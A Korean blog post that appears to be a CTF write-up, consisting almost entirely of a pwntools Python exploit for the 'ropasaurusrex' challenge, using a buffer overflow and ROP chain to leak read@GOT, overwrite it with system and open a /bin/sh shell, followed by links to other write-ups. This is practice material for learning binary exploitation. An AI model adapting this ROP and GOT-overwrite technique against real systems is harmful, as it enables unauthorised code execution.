티스토리 뷰
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | from pwn import * p = process('./ropasaurusrex') e = ELF('./ropasaurusrex') pppr = 0x080484b6 #context(arch='i386',os='linux',endian='little',log_level='debug') payload="A"*140 offset = 0x9ad60 # read- system payload+=p32(e.plt['read']) payload+=p32(pppr) payload+=p32(0) payload+=p32(e.bss()) payload+=p32(len("/bin/sh\x00")) payload+=p32(e.plt['write']) payload+=p32(pppr) payload+=p32(1) payload+=p32(e.got['read']) payload+=p32(4) payload+=p32(e.plt['read']) payload+=p32(pppr) payload+=p32(0) payload+=p32(e.got['read']) payload+=p32(4) payload+=p32(e.plt['read']) payload+="AAAA" payload+=p32(e.bss()) p.send(payload) p.send("/bin/sh\x00") read = u32(p.recv(4)) print hex(read) system = read - offset print hex(system) p.send(p32(system)) p.interactive() | cs |
'Pwnable > write up' 카테고리의 다른 글
[DEFCON 2015] r0pbaby (0) | 2018.09.16 |
---|---|
[Sunrin Internel CTF] cee (0) | 2018.09.16 |
[Codegate2018_quals] BaskinRobins31 (0) | 2018.09.16 |
[HITCON 2017] start (0) | 2018.09.14 |
[Defcon 2016]feedme (0) | 2018.08.27 |
댓글